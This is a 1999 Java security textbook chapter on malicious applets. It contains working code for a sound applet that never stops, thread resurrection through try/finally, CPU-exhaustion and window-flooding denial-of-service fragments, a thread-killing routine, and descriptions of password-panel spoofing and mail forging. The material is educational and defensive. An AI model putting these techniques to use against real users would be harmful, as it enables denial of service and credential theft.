With Java off, surf to the Web page with a suspected malicious applet; for example, the DigiCrime site includes a malicious applet called "bluescreen" at www.digicrime.com/exploits/javawin. A quick look at the HTML source for the page shows that the malicious applet is invoked with the following code snippet: <APPLET CODE="bluescreen.class" CODEBASE="http://www.digicrime.com/surprise" width=1 height=1> This gives you all the information you need to snag the class file (without running it) and bring it home for dissection. The next step is to point your browser directly at the class file by opening URL www.digicrime.com/surprise/bluescreen.class. Your browser will display some gobbledygook like Ê_°_me`, which is actually the byte code of the class file as shown in "human readable" form. Use the Save As feature of your browser to save the file bluescreen.class on your disk. Now that you have the file, you can use a Java decompiler to turn it back into readable Java source code. The once-popular Mocha decompiler is now out of date as its author, Han Peter van Vliet, died an untimely death. However, there are other decompilers available. The best is the SourceAgain decompiler from Ahpah Software. After decompiling the byte code, you can inspect the resulting Java source code for malicious behavior. Note that the decompilation issue is a complex political football. Laws have been proposed that make decompiling copyrighted code illegal, even if it is done by security researchers for the purposes of code analysis. The intent of the laws is to prevent software piracy, but they are overly broad in their language. The bottom line is to educate yourself about such laws before you begin decompiling code to analyze it. Once you know what a malicious applet is going to do, you may feel more comfortable running it. Keep in mind that there is no guarantee that the class file that you grab and decompile will be the same as the one you eventually run from a Web site. The Web server can easily be programmed to bait and switch so that it changes the class file that it distributes unpredictably. Unless you run your grabbed copy of the class file from your own Web server, all bets are off.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 2 -- Annoying Applets
The simplest kind of malicious applet is only annoying. Malicious applets of this type do things just beyond acceptable. Because Java has powerful multimedia packages, annoying applets can do a large variety of things, ranging from playing sound files continuously to displaying obscene pictures. Java has attracted its share of bad programmers and, depending on your point of view, bad Java code can be annoying. To be counted as a hostile applet, some malicious intent on the part of the author is usually required; therefore, unintentionally lousy Java code may not count. Just for the record, a poorly written Java applet may aid a real cracker in breaking your Java security system. Avoid running crummy code, and if you're developing code, use sound software engineering practices and follow the guidelines provided in Chapter 7. One particularly humorous annoying applet opens a dialog box with the message "April Fools" and an OK button. Users naturally think the applet is supposed to exit when you click OK as it says on the screen. But the dialog box zips around the screen, avoiding the mouse as the user tries to click OK. This quirk renders the applet difficult to stop through normal means. The easiest way to get rid of it is to exit the browser. Listing 4.1 provides the code for another annoying applet based on an idea from Mark LaDue.1 This applet appears to be well-behaved, at first. All it does is display a nice little picture of one of the author's dogs (and baby Jack). It also plays some appropriate background sound (the dog barking). Not all that exciting for an applet. The code is shown in Listing 4.1. Listing 4.1 NoisyApplet sustains a thread past the time its creating class is unloaded.
/* /* /* /* /* /* /*
NoisyApplet.java */ Adapted from the NoisyBear applet of Mark LaDue. You will need a sound file and a picture to make this work. */ This applet is provided solely as an example and is not guaranteed to do anything. */ Use it at your own risk. */
*/ */ */
import java.applet.AudioClip; import java.awt.*; public class NoisyApplet extends java.applet.Applet implements Runnable { Font msgFont = new Font("TimesRoman", Font.PLAIN, 36); Thread noisethread = null; // thread to run sound in Image jackImage; Image offscreenImage; Graphics offscreenGraphics; AudioClip bark; // sound file variable // the init() runs to set things up public void init() { // first, set up the picture jackImage = getImage(getCodeBase(), "jack+waldog.jpg"); offscreenImage = createImage(this.size().width, this.size().height); offscreenGraphics = offscreenImage.getGraphics(); // then load the audio file bark = getAudioClip(getCodeBase(), "bark.au"); } // the start() method runs whenever you enter the // applet's page. it also runs after init() public void start() { // start a thread to run the audio clip in if (noisethread == null) { noisethread = new Thread(this); noisethread.start(); } } // the stop() method runs when you exit // the applet's page public void stop() { if (noisethread != null) { // uncommenting the following 2 lines will stop // the sound
// if (bark != null) // bark.stop(); noisethread.stop(); noisethread = null; } } // this starts the ball rolling by telling the sound // to "go" public void run() { if (bark != null) bark.loop(); } // the paint() method draws the graphics public void paint(Graphics g) { int jack_width = jackImage.getWidth(this); int jack_height = jackImage.getHeight(this); offscreenGraphics.drawImage(jackImage, 0, 0, jack_width, jack_height, this); offscreenGraphics.setColor(Color.red); offscreenGraphics.setFont(msgFont); offscreenGraphics.drawString( "Walnut says HI HI HI ...", 150, 225); // actually draw the image g.drawImage(offscreenImage, 0, 0, this); } }
This applet has been tested and proven to be annoying on a large number of platform/browser combinations. What makes the NoisyApplet annoying is that the sound never stops, even if the user surfs to another Web page. How could this happen? Simple; the applet starts a thread that never stops! Why does the sound keep on going? As you can see in the Listing 4.2, the stop() method of the NoisyApplet class has been redefined. The redefinition makes the thread live until the user either figures out how to kill the thread, disable audio on the target machine, or quit the browser.2 None of these options are particularly convenient. The lines commented out would silence our NoisyApplet by installing a more normal stop() method. By commenting out these lines you can turn our somewhat-typical applet into a malicious annoyance. Clearly, the line between an honest mistake and an antagonistic programming practice is very fine indeed.
There are some interesting implications that our simple annoying applet introduces. Any thread can employ the same strategy of redefining the stop() method in order to run ad infinitum. Depending on the way a Security Manager is written, Java may not require a programmer to stop all threads. Overriding the default stop() method is, as we have shown, a trivial exercise. Threads can run even in the absence of the applet that spawned them, meaning that it is possible to write threads that monitor what the user is doing.
Going beyond stop() Redefining the stop() method is an easy thing to do, but it is sometimes possible to determine that an applet is doing this by inspecting its byte code. An alternative to redefining the stop() method is wrapping an attack in a try/finally block. This technique is often seen in malicious applets. In fact, today's slickest malicious applets both redefine stop() and use a try/finally strategy. An example is shown in Listing 4.3. Listing 4.3 Using try/finally to defeat ThreadDeath. public void run() { try { //do somthing interesting here } catch(ThreadDeath td){System.out.println("Can't touch this!");} // Return from the dead finally{ Thread.reborn = new Thread(, "new"); reborn.start(); } }
The idea is to catch any exceptions that might be sent to an applet thread to try to kill it (for example, a ThreadDeath exception, which is what is thrown when Thread.stop() is called). These exceptions are caught in the body of the block. In the finally block, a malicious applet can include code to resurrect itself in case of a problem. Note that the same sort of thing can be done using an applet's finalize() method, which gets invoked during garbage collection. This technique counters all attempts to kill a thread and can be used to defeat a majority of commercial Java security packages that claim to be able to kill hostile applets. Stopping an applet that does not want to be stopped is a nontrivial undertaking. One approach might be to hook deeply into the Java runtime and terminate an actual OS thread, but this is problematic since it would sometimes destabilize the entire browser. Since stopping applets is difficult, making monitoring applets is easy.
The Business Assassin Applet One such monitoring applet (possibly an armchair exercise) is called the Business Assassin applet [Dean, et al., 1996; LaDue, 1996]. The Business Assassin targets the applets of a particular Web site, such as applets from Gamelan. If you place this applet on your homepage, it will start up threads on the remote machine of anyone who surfs your site with Java enabled. These threads silently watch for other applets being loaded from Gamelan. If the monitoring threads detect the user surfing the Gamelan Web site, they begin the attack. The malicious threads make useless any applets coming in from Gamelan. They kill the threads of Gamelan applets (something discussed in more detail on page 135). Another feature of the Business Assassin applet (code disabled by default) goes on to launch a denial-of-service attack against anyone who visits Gamelan after running the Assassin. On the surface, the Business Assassin applet appears to be harmless; that is because it uses threads to do all the dirty work. Threads are not required to stop running when an applet's Web page is exited. This means that threads can keep running in the browser after an applet has appeared to finish. In order to have the blame pinned on some other applet, hostile threads can be programmed to delay their attack until some future time. In the case of the Assassin's threads, an apparent problem in the Security Manager (only addressed recently by Java 2) allows the Assassin threads to attack thread groups that belong to applets other than their own. It waits for the target threads from Gamelan to appear and only then initiates hostile activity. Applets like the Business Assassin will certainly have a chilling effect on Web-based commerce. Even if applets that use never-ending threads are not used for annoying things like these, they still have the potential to be used for information gathering. If an applet can spawn a monitoring thread, there is no reason that it could not report information it finds interesting back to its server. Such information could include lists of sites a user has visited, files that he or she has downloaded, the names of other competing applets run, or a host of other things. Such monitoring applets should be named BigBrother.
Previous Page
Search the Book Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 3 -- Denial of Service
In a cracker's world, the next-best thing to breaking in to your computer is locking you out of it. After all, if the cracker cannot use your computer, then neither should you! Attacks that prevent someone from using his or her machine are called denial-of-service attacks in the security community. Denial of service comes in many guises. Attacks may involve consuming all available CPU cycles, allocating every last bit of memory, hogging all possible screen space, or causing a system to hang while it waits for something impossible to happen. The one common requirement is that the user being attacked is effectively locked out of his or her machine. An effective denial-of-service attack happens so quickly that it's usually impossible to stop it. Experiencing such an attack is a sobering event. There are many ways to write applets initiating denial-of-service attacks. We think these attacks are serious enough that code for them is not listed here. Examining some attacks through high-level description and occasional code fragments should be enough to illustrate a point. Realistically, the sorts of malicious applets being described are not too difficult to dream up. People who are interested will be able to either create the code or find it, as they see fit. Consider the denial-of-service attack presented in Listing 4.4. It recycles an idea from the NoisyApplet making use of nonterminating threads. Quite simple to formulate, it looks something like this: 1. Create an applet that starts a thread with its priority set to MAX_PRIORITY. This makes the thread run as quickly as possible and gives it a leg up in the ongoing competition between threads for CPU time. 2. Redefine the stop() method to null for the thread. 3. Do something silly in the main part of the applet so that it appears to be harmless. Show a picture or display some cute animation. 4. Have the thread sleep for a while to delay its malicious activities. Such sleight of hand will have the effect of placing the blame somewhere else when the thread wakes back up to perform its dirty work.
5. When the thread wakes up, have it begin calculating in an infinite loop (or some other CPUintensive activity that eats cycles). Such a computation will, in effect, bring the browser down by taking away all available computational resources. One particularly worthy function for intense calculation overload is the Ackerman function shown in Listing 4.4. Listing 4.4 The Ackerman function implemented as a Java application. Ackerman takes integer n and exponentiates n by itself n times. This means that Ackerman(3) is equivalent to three cubed, cubed. The program can be run by typing the command java Ackerman n, where n is an integer. Computing anything greater than Ackerman(3) takes a long time and many CPU cycles. This code was written to be as inefficient as possible. This version of Ackerman could easily be used in a denial-of-service attack.
import java.lang.System; import java.io.IOException; import java.lang.Math; class Ackerman { public static void main(String[] args) { long ackValue = 1; long exp = 0; if (args.length >= 1) { try { exp = Integer.parseInt(args[0]); } catch (NumberFormatException e) { exp = 0; } } if (exp > 1) { ackValue = exp; int numLoops = (int)exp; for (int i = 1; i < numLoops; i++) { exp = ackValue; for (int j = 1; j < numLoops; j++) { ackValue = ackValue * exp; System.out.println("current value is " + ackValue); } } System.out.println("Ackerman vlue: " + ackValue); } }
This denial-of-service approach is simple and elegant. There are literally hundreds of things that can be done in Step 5. Other possibilities include endlessly appending to a StringBuffer and using drawString to display its entire contents. This ends up as a double whammy, eating both CPU cycles and memory. Another possibility would be calculating p using the most inefficient algorithm possible. If you have trouble remembering how to code poorly, just teach an introductory programming course to jog your memory.
On a more serious note, this line of attack is both very simple and very successful. Most browsers seize up and die under such an attack. Applets that implement these strategies exist on the Web now. Skeptical readers are welcome to surf over and kill their browsers personally (www.rstcorp.com/hostile-applets/). Just surf to a Web page containing hostile applets using a Java-enabled browser, and they will automatically be invoked. Short of creating and enforcing a mobile code policy based on code-signing, nothing can be done to prevent them. Chapter 6 examines some strategies for protection, but they are all still in early development. Just to complicate matters, such a hostile applet can implicate other Web pages by using delay tactics discussed previously.
Is Denial of Service All That Bad? There is no doubt that denial-of-service attacks are less serious than security breaches of the sort we discuss in Chapter 5. Although a browser might be crashed with such attacks, intruders do not gain entry into a system. This has led some people at JavaSoft to dismiss this class of attacks as unimportant. Before Arthur van Hoff (one of the original designers of Java) left JavaSoft for Marimba, he posted a note to comp.lang.java that dismissed such problems as either not very serious or a concern for browser vendorsnot JavaSoft. Although the most serious security problems should be addressed first, denial-of-service applets should also be addressed. Using resource allocation limitations-for example, placing upper limits on CPU usage, number of instructions that can run, or number of windows allowed-is one line of defense. Threads should not be able to override the stop() method so easily, either. (The ability to override stop, or not, is now enforced by policy.) It is ironic that some of the most Java-heavy Web pages almost go as far as denial of service in doing what their programmers intended. Some Java-enhanced sites take quite a while to load (we have heard of some applets that take 10 minutes to start up, even over a very fast T1 connection). The bottleneck likely involves the byte code Verification process and not the network transmission time. Of course, slow loading/verifying really doesn't constitute a true denial-of-service attack. Even a denial-of-service attack that is no big deal when embedded in an applet becomes a serious problem if it can be launched against a Web server. Sites that use Java-enabled Web servers and configure those servers to allow anyone to upload a servlet are exposing themselves to easy denial-of-service attacks. In short, anyone, anywhere in the world, can bring down such a server whenever he or she feels like it. That's why we recommend that Java-enabled servers only accept servlets from clients that they really trust.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 4 -- Opening Untrusted Windows
A more serious denial-of-service attack than browser-killers involves opening large numbers of very large windows. There are a couple of reasons why this kind of attack should be considered more severe. The side effects of this attack tend to freeze access to the keyboard and mouse while the applet runs. This makes the applet harder to control. Also, the way these windows are created and mapped makes it possible to pop up untrusted Java applet windows without the mandatory warning they are supposedly required to display. A denial-of-service applet based on this idea would be very similar to the ones we discussed on page 128, with the addition of the window-popping code shown here: // In the code below, littleWindow is of type Frame // Adapted from an idea by Mark LaDue try { // create a window littleWindow = new bigFrame("Whocares"); // make it very big littleWindow.resize(1000000, 1000000); // position it to cover everything littleWindow.move(-1000, -1000); // finally, open the window littleWindow.show(); } catch (OutOfMemoryError o) { repaint(); } class bigFrame extends Frame { // constructor method Label 1;
bigFrame(String title) { super(title); setLayout(new GridLayout(1, 1)); Canvas whiteCanvas = new Canvas(); whiteCanvas.setBackground(Color.white); add(whiteCanvas); } }
This code opens a very large (1-million x 1-million pixel) white window without the supposedly mandatory untrusted Java applet window message. Put this code in a loop so many windows pile on top of each other, and voilá, an applet that consumes major resources in an interesting new way. The act of generating many windows all at the same time causes many window events to fill the window manager's event queue. This effectively disables the mouse and keyboard, since they talk to the machine through window events themselves. The console of the workstation displaying these very large windows freezes up. There are two things users can do when an attack like this is leveled against them: Go to another machine on the same network to kill the offending browser processes, or reboot (usually with the three-fingered salute). The ability to open a window without the mandatory untrusted window banner is interesting in its own right. Using variants of such code, it is possible to spoof Web site password panels. This leads to interesting social engineering attacks, wherein an unsuspecting user is asked to provide his or her password due to a spurious security alert event. Many users fall for such schemes. After collecting login and password information, a malicious applet can mail off the information to a collection site for later use by a cracker. Spoofing Web site password panels is an interesting illustration of how an attacker can whip up a serious attack out of a set of holes that each look fairly innocuous. An adversary could create an applet that appears to stop when the user leaves its page, but really keeps a thread lurking in the browser. That thread could use monitoring techniques to determine when the user has visited a particular target site. It could then display a spoof of the target site's log-in panel. The user would probably be fooled, since the bogus log-in panel would appear at the "right" time. Applets that use a social engineering attack to collect possibly sensitive information can be found at the DigiCrime Web site. Surf there at your own risk.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 5 -- Stealing Cycles
Theoretical computer science teaches that some computational problems are much more difficult than others. Very hard problems scale exponentially. Other problems are solvable in Polynomial time, but only using an oracle that can correctly decide which path to follow each time a choice is encountered. The second set of problems is termed NP. One of the most perplexing problems in computer science was introduced in 1977 by three cryptography researchers named Rivest, Shamir, and Adelman. They invented a sophisticated encryption algorithm called RSA, (after their initials). The only known Achilles Heel of the RSA cryptosystem rests on the ability (or rather, inability) to factor a very large integer into a product of prime numbers in a reasonable length of time. The exact complexity of prime factoring is not known, but it is expected to be difficult and has proven to be so thus far. One particular instance of the RSA problem involves factoring a specific 129-digit number into its prime factors. Using theoretical computer science as a guide, Rivest, Shamir, and Adelman estimated that it would take 4 x 1016 years to factor RSA-129. However, applying the quadratic sieve algorithm along with the collaboration of thousands of volunteers (who donated CPU time on their workstations), researchers solved RSA-129 in 1994 after less than a year of work. The key to the solution was using thousands of computers at the same time to attack the factoring problem. To prove that they had discovered the proper solution, the distributed-factoring researchers used their solution to break a secret coded message that Rivest, Shamir, and Adelman had created in 1977 as a test. The message read, "The magic words are squeamish ossifrage." Java offers a unique opportunity for use in cooperative projects such as factoring RSA-129. Some of the researchers involved in factoring RSA-129 recently announced they had also factored RSA-130-in a fraction of the time. Java would make cooperative efforts much easier through platform independence. So what does this have to do with malicious applets? One critical feature of the RSA efforts was the voluntary participation. That is what made them cooperative efforts. The same sort of factoring could be accomplished using a malicious applet. Such an applet would surreptitiously steal CPU cycles from the
machine of any Web user who hit its Web page. The applet would spin a thread on the remote machine to run part of a factoring solution on that machine's CPU. After a sufficient amount of work, a partial solution could be mailed back to a collection site for collation with similar results from elsewhere. There is no reason a CPU-cycle-stealing applet needs to work on factoring. It can perform any work. Using such an applet, a Web miscreant could instantly upgrade his or her 486-DX2/66 into a huge collective machine with the combined power of hundreds of workstations. Workstations around the world could be automatically pressed into service. Imagine the dismay of a CEO who discovers that her new Whiz-bang 4200+ has been helping compute results for a competitor. Or imagine the legal ramifications in store for the owner of a government machine that inadvertently helps a foreign national break an encryption algorithm. Or imagine a computer hardware manufacturer who specs out a competitor's machine using a stealthy benchmark applet. The possibilities are many.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 6 -- Forging Mail
Many Net-savvy people are aware of a simple trick that allows users to forge electronic mail. This is accomplished by talking directly to the SMTP daemon on port 25 of a server machine. The mail-forging attack takes advantage of the fact that mail-serving hosts monitor port 25 for incoming Simple Mail Transfer Protocol (SMTP) messages. One of the Internet rites of passage is to telnet to port 25 and send fake mail to a friend. This game is very well known; however, the scheme is easily debunked. The SMTP daemon actually marks the forged mail with the IP number of the machine that connected to port 25, which makes it very easy to discern which machine sent the mail.3 Spammers often forge mail headers so that the true source of a spam message is hard to discern. It is usually easy to detect forged mail by looking carefully at the header. The machine listed in the From line should be the same as the Received: line. Most users and mail readers look only at the From line; systems people know to look at both. Note that some legitimate mail may have differing From and Received: lines, depending on how people send their mail. Here is an example of mail forged by an author on his home machine (tigger.mediasoft.net) to his own work account. Note how the From and Received: lines differ.
From
[email protected] Wed Jul 24 19:33:56 1996 Return-Path:
Received: from tigger.mediasoft.net by rstcorp.com (4.1/SMI-4.1) id AA21199; Wed, 24 Jul 96 19:33:54 EDT Received: from rstcorp.com ([email protected][205.139.200.246]) by tigger.mediasoft.net (8.6.12/8.6.9) with SMTP id SAA00966 for [email protected]; Wed, 24 Jul 1996 18:30:31 -0400 Date: Wed, 24 Jul 1996 18:30:31 -0400 From: [email protected] Message-Id: <[email protected]> Apparently-To: [email protected] Status: RO This is forged mail.
Applets provide an interesting new twist on the standard approach to mail forging. Because applets load across the network and run on a Web surfer's machine, a mail forging applet can cause the standard SMTP daemon monitoring port 25 to report mail coming from the Web surfer's machine-not the machine serving the applet. This can be leveraged to doubly forge mail. Imagine that Alice hits a Web page and an applet is consequently run on her machine. By using Alice's machine to forge mail from Alice-that is, to forge mail apparently both from her machine and from her account on that machine-the doubly forged mail appears not to have been forged at all! With many standard server configurations, this forging attack is possible. Figure 4.4 illustrates the difference between the standard port 25 attack and the revised applet attack.
Figure 4.4 The usual mail-forging approach versus the applet-based sendmail approach. Because an applet runs on another host, it is possible to doubly forge mail so the resulting message does not appear to be forged.
Forged mail of this sort can be sent to any email address that the applet's author chooses. The message could, of course, be anything at all. To make this more concrete, imagine an applet that sends an email death threat to the president of the United States (a felony) from the account and machine of anyone naïve enough to browse a malicious Web page with Java enabled. Or, imagine an applet that uses mail to spam hundreds of Usenet newsgroups with a fake legal advertisement apparently posted from the victim's machine and account, immediately spawning a mail bomb attack against the applet's victim from angry Usenet users bent on retaliation. There are many variations on this theme. Using threads, it is possible to forge mail in the background while doing something seemingly innocuous in the foreground. This forging activity is currently possible; in fact, there are multiple examples to be found on the Web. The possibly surprising fact is that the attack we have described is completely within the security bounds of what SMTP and Java are allowed to do. Forging mail like this is neither particularly sophisticated nor hard to implement. On the other hand, the havoc that could be wreaked with a malicious applet of this sort is serious.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 7 -- Killing Off the Competition
The Business Assassin applet discussed earlier combines two dirty tricks. The first trick is to spawn a monitoring thread to watch for applets from another site. The second trick is to kill the threads of any incoming applets. According to the rules, an applet should not be allowed to kill the threads of other applets. Unfortunately, what should not be allowed to happen and what actually can happen are not always the same. Implementation bugs in the security check for thread access for all JDKs through 1.1.5 allow downloaded applets to access threads outside their own thread group. Killing a thread is easy. Here is a code fragment that does it: private static void ThreadMurder(Thread t){ t.stop(); }
You may wonder why the t.stop() method is inside the ThreadMurder() method. This code will kill any thread t. It would be wise for the thread calling ThreadMurder() not to kill itself. A test inside ThreadMurder() is an obvious way to protect the calling thread. All that is needed is a simple name check. If the thread turns out to be checking itself, a decision is made to do nothing. To make an applet that kills all threads not belonging to itself requires a bit more work. For clarity, let's call this applet AssassinApplet. A recursive approach to AssassinApplet is probably best. The basic outline is: 1. Starting with the current thread group, ascend to the root thread group. 2. From the root, recursively descend through all threads and thread groups below. 3. Kill each thread encountered (but not self).
This approach is both very nasty and very effective. If coded as just shown, an AssassinApplet would be able to kill all other applets running when it starts (a nice way to shut the NoisyApplet up!). It would also kill all applets that it comes across after that. Since it is possible within our framework for the applet to name who should not be killed, the AssassinApplet could run in tandem with other chosen applets. In fact, using the AssassinApplet at all times is a halfbaked alternative to turning Java off! Just run the AssassinApplet once at the beginning of a session and after that, all applets encountered from then on are guaranteed to be killed soon after arrival. The good news is that we can defeat the ThreadMurder attack shown here using the try/finally approach discussed earlier. The bad news is any hostile applet can, too.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 8 -- Malicious Applets on the Web
The most extensive collection of malicious applets can be found on Mark LaDue's Hostile Applets Home Page. LaDue does not follow our naming convention, which separates attack applets from malicious applets. But in any case, all of the applets that LaDue has created are malicious applets. In July 1998, a group of LaDue's newer malicious applets, those that allow creation of a ClassLoader in Netscape 4.04 and 4.05, were leveraged to create an attack applet. LaDue's ClassLoader subclassing when combined with the discovery of a ClassLoader bug by the Princeton team (see Chapter 5) made possible a real attack. LaDue's malicious applets perform the following hostile activities: ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●
Play a sound file forever (our NoisyApplet is adapted from this one). Kill a browser with a CPU-hogging attack. Consume all available memory on your machine. Spin endless threads to consume resources. Display many hundreds of large black windows. Combine many denial-of-service attacks (windows, threads, and sounds) into one payload. Pop a fake dialog box requesting sensitive information (username and password). Surreptitiously perform remote calculation and report results back to the server. Forge mail. Kill all applet threads (except for self). Send your browser to a URL over and over again. Obtain your username. Fill all disk space available to the browser. Create an AppletClassLoader (a good staging ground for more serious attacks). Exercise mystery methods (undocumented but available) that crash a browser. Misuse native methods through the Java API, resulting in a crash. Deny legitimate use of the audio system by retaining control over it. Steal information about the SystemPrincipal and create an impostor.
● ● ● ●
Determine exactly which plugins a browser has with help from JavaScript. Steal information from a Java Wallet (including username and password). Carry out some social engineering in order to rewire the Help button of the Java Wallet. Cause a modem connected to an arbitrary serial port to dial.
The most interesting feature of LaDue's malicious applets is that source code is made available. LaDue is clearly no proponent of keeping secrets! No other author of malicious applets has been as prolific as LaDue, but notable among available malicious applets are: ●
● ●
An extremely simple recursive applet that pops the stack and crashes the VM (Naval Postgraduate School) A mail forger and a file scanner written by Jim Buzbee An applet that abuses the redirect capability written by Ben Messander
Links to known malicious applets on the Web are maintained on the Java Security Hotlist.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
The Base Java Security Model: The Original Applet Sandbox CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 Previous Page
Section 13 -- Is There Really a Java Security Policy?
Next Page
The base Java Security sandbox is comprised of three major components: the byte code Verifier, the Class Loader, and the Security Manager. Each of these components must work properly in order for Java to perform in a secure fashion. The Security Manager depends on Class Loaders to correctly label code as trusted or untrusted. Class Loaders also shield the Security Manager from spoofing attacks by protecting local trusted classes making up the Java API. On the other hand, the class loader system is protected by the Security Manager, which ensures that an applet cannot create and use its own Class Loader. The Verifier protects both the Class Loaders and the Security Manager against language-based attacks meant to break the VM. All in all, the three parts intertwine to create a default sandbox. However, the three parts are not created or specified by a standards committee. Java applications, including Java-enabled Web browsers, are allowed to customize two of the fundamental portions of the security model to suit their needs (the Class Loader and the Security Manager). The security model is much more distributed than many computer security experts would like [Badger and Kohli, 1995]. In the end, a great deal of faith is placed in the ability of VM implementations to ensure that untrusted code remains properly contained. Bugs in the system will compromise the entire security model. In 1996, we complained that there was no formal, high-level security model in Java. Instead, the security policy is derived from a collection of low-level detail checking. This is difficult because without a formal model it is impossible to say what secure means. With no standardized model, each vendor is free to define the term secure. In addition, no particular implementation can be verified. A little progress towards a more formal description of the security model was made when Sun commissioned a report entitled Security Reference Model for JDK 1.0.2 [Erdos, et al, 1996]. This sort of work is what users of securitycritical consumerware should demand. Unfortunately, the SRM is now seriously out of date. Once again, Internet-time-compressed development schedules have outstripped the need for rigorous security design and analysis. This is a common trend in consumer software, and one that is destined to flame out under the
rigorous security demands of e-commerce. Programming language researchers have also done some work trying to prove the soundness of the Java language and the VM definition [Drossopoulou and Eisenbach, 1998; Stata and Abadi, 1998]. Although this work is still in preliminary stages, some interesting and suggestive results are available. The bottom line is that the definition of Java will probably turn out to be sound, once many more details have been filled in. The Java runtime system is large (upwards of 28,000 lines of code, not including the VM). This raises important security assurance questions. Generally speaking, programs as large and complex as that are extremely hard to verify. It is common knowledge that buggy software causes many security vulnerabilities [Garfinkel and Spafford, 1996]. There is no centralized authority ensuring that Java's security code is bug free. The Java security system has seen the benefit of external peer review (some solicited and some not). JavaSoft has put together a Security Advisory Board (including one of the authors) and now includes prominent security researchers among its staff. Outsiders have done their best to keep security claims honest, and a number of security researchers (including the authors of this book) are spending a fair amount of effort still trying to find its weaknesses. Later in the book, we discuss some of the problems researchers have found, and what Java vendors are doing to address them. Before we dig into that topic, we introduce the new security mechanisms found in Java 2 and discuss why the Java security model is a completely new beast.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Beyond the Sandbox: Signed Code and Java 2 CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 1 -- What's the Main Goal?
Everyone agrees that code signing makes the Java security model a lot more complicated, not to mention actually using the new system. Where security is concerned, complexity is bad since it increases the odds of an error in the system's design or implementation. If we're going to add all of this complexity, what exactly is it that we are gaining? What's the main goal? The main goal is to gain better control over the security of mobile code. We can achieve this goal by winning the battle on three fronts. By adding code signing and expanding beyond a black-and-white trust model, we hope to gain: 1. The ability to grant privileges when they're needed. 2. The ability to have code operate with the minimum necessary privileges. 3. The ability to closely manage the system's security configuration. We can judge the JDK 1.1 and Java 2 security models by how well they meet these objectives. The first objective is simple: We want to give trusted code the privileges it needs to get its job done. A word-processing applet needs the ability to read and write files, so we want to grant this privilege if we have enough faith that the applet won't misbehave. In general, users want to be able to grant any privileges at all to any code they choose, as long as the benefits of doing so outweigh the risks. The second objective is to have code that operates with the minimum necessary privileges at all times. Security experts call this the "principle of least privilege." This is a common-sense idea-why use a chain saw when a butter knife is sharp enough for the job-but it has profound implications if we carry it to its logical conclusion. One simple implication is that we want programmers to have a way to renounce their privileges when they aren't needed and reenable the privileges when they are needed. The principle of least privilege can be applied in many places throughout the system:
● ●
● ●
